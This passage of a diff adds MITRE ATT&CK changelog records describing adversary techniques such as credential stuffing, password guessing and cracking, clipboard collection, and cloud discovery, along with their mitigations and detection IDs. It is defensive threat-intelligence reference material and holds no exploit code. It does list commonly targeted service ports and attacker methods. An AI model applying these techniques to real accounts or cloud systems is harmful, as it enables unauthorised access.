+                    "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1110/004",
+                            "external_id": "T1110.004"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-068A 2018",
+                            "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Diogo Fernandes",
+                        "Anastasios Pingios"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2025-10-24 17:49:14.923000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1036: Account Use Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0460: Credential Stuffing Detection via Reused Breached Credentials Across Services"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:38:56.197000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Password Cracking",
+                    "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) \n\nTechniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1110/002",
+                            "external_id": "T1110.002"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        },
+                        {
+                            "source_name": "Wikipedia Password cracking",
+                            "description": "Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.",
+                            "url": "https://en.wikipedia.org/wiki/Password_cracking"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mohamed Kmal"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:29.397000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0105: Post-Credential Dump Password Cracking Detection via Suspicious File Access and Hash Analysis Tools"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:38:22.617000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Password Guessing",
+                    "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1110/001",
+                            "external_id": "T1110.001"
+                        },
+                        {
+                            "source_name": "Trend Micro Emotet 2020",
+                            "description": "Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.",
+                            "url": "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi"
+                        },
+                        {
+                            "source_name": "Cylance Cleaver",
+                            "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.",
+                            "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-068A 2018",
+                            "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Microsoft Threat Intelligence Center (MSTIC)",
+                        "Mohamed Kmal"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:21.929000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1036: Account Use Policies",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0551: Password Guessing via Multi-Source Authentication Failure Correlation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--800f9819-7007-4540-a520-40e655876800",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-03-30 17:54:03.944000+00:00",
+                    "modified": "2026-05-12 15:12:00.662000+00:00",
+                    "name": "Build Image on Host",
+                    "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1612",
+                            "external_id": "T1612"
+                        },
+                        {
+                            "source_name": "Aqua Build Images on Hosts",
+                            "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.",
+                            "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"
+                        },
+                        {
+                            "source_name": "Docker Build Image",
+                            "description": "Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.",
+                            "url": "https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild"
+                        },
+                        {
+                            "source_name": "Aqua Security Cloud Native Threat Report June 2021",
+                            "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.",
+                            "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security",
+                        "Roi Kol, @roykol1, Team Nautilus Aqua Security",
+                        "Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security",
+                        "Vishwas Manral, McAfee"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.662000+00:00\", \"old_value\": \"2026-04-15 19:56:51.027000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1030: Network Segmentation",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0459: Detection Strategy for Build Image on Host"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:25.967000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Clipboard Data",
+                    "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1115",
+                            "external_id": "T1115"
+                        },
+                        {
+                            "source_name": "CISA_AA21_200B",
+                            "description": "CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-200b"
+                        },
+                        {
+                            "source_name": "mining_ruby_reversinglabs",
+                            "description": "Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.",
+                            "url": "https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems"
+                        },
+                        {
+                            "source_name": "clip_win_server",
+                            "description": "Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.",
+                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip"
+                        },
+                        {
+                            "source_name": "MSDN Clipboard",
+                            "description": "Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.",
+                            "url": "https://msdn.microsoft.com/en-us/library/ms649012"
+                        },
+                        {
+                            "source_name": "Operating with EmPyre",
+                            "description": "rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.",
+                            "url": "https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:36.079000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0341: Clipboard Data Access with Anomalous Context"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 15:26:11.741000+00:00",
+                    "modified": "2026-05-12 15:12:00.721000+00:00",
+                    "name": "Cloud Administration Command",
+                    "description": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment\u2019s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1651",
+                            "external_id": "T1651"
+                        },
+                        {
+                            "source_name": "AWS Systems Manager Run Command",
+                            "description": "AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March 13, 2023.",
+                            "url": "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html"
+                        },
+                        {
+                            "source_name": "MSTIC Nobelium Oct 2021",
+                            "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/"
+                        },
+                        {
+                            "source_name": "Microsoft Run Command",
+                            "description": "Microsoft. (2023, March 10). Run scripts in your VM by using Run Command. Retrieved March 13, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Cisco",
+                        "Nichols Jasper",
+                        "Jared Wilson",
+                        "Caio Silva",
+                        "Adrien Bataille",
+                        "Anders Vejlby",
+                        "Nader Zaveri",
+                        "Tamir Yehuda"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.721000+00:00\", \"old_value\": \"2025-04-15 19:59:13.081000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0545: Detection Strategy for Cloud Administration Command"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-08-20 17:51:25.671000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Cloud Infrastructure Discovery",
+                    "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket\u2019s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1580",
+                            "external_id": "T1580"
+                        },
+                        {
+                            "source_name": "Expel IO Evil in AWS",
+                            "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.",
+                            "url": "https://expel.io/blog/finding-evil-in-aws/"
+                        },
+                        {
+                            "source_name": "AWS Head Bucket",
+                            "description": "Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.",
+                            "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html"
+                        },
+                        {
+                            "source_name": "AWS Get Public Access Block",
+                            "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.",
+                            "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html"
+                        },
+                        {
+                            "source_name": "AWS Describe DB Instances",
+                            "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.",
+                            "url": "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html"
+                        },
+                        {
+                            "source_name": "Amazon Describe Instance",
+                            "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.",
+                            "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html"
+                        },
+                        {
+                            "source_name": "Amazon Describe Instances API",
+                            "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.",
+                            "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html"
+                        },
+                        {
+                            "source_name": "Google Compute Instances",
+                            "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.",
+                            "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list"
+                        },
+                        {
+                            "source_name": "Mandiant M-Trends 2020",
+                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft AZ CLI",
+                            "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest"
+                        },
+                        {
+                            "source_name": "Malwarebytes OSINT Leaky Buckets - Hioureas",
+                            "description": "Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.",
+                            "url": "https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Regina Elwell",
+                        "Praetorian",
+                        "Isif Ibrahima, Mandiant"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2025-10-24 17:48:49.479000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0169: Detection Strategy for Cloud Infrastructure Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-08-30 13:01:10.120000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Cloud Service Discovery",
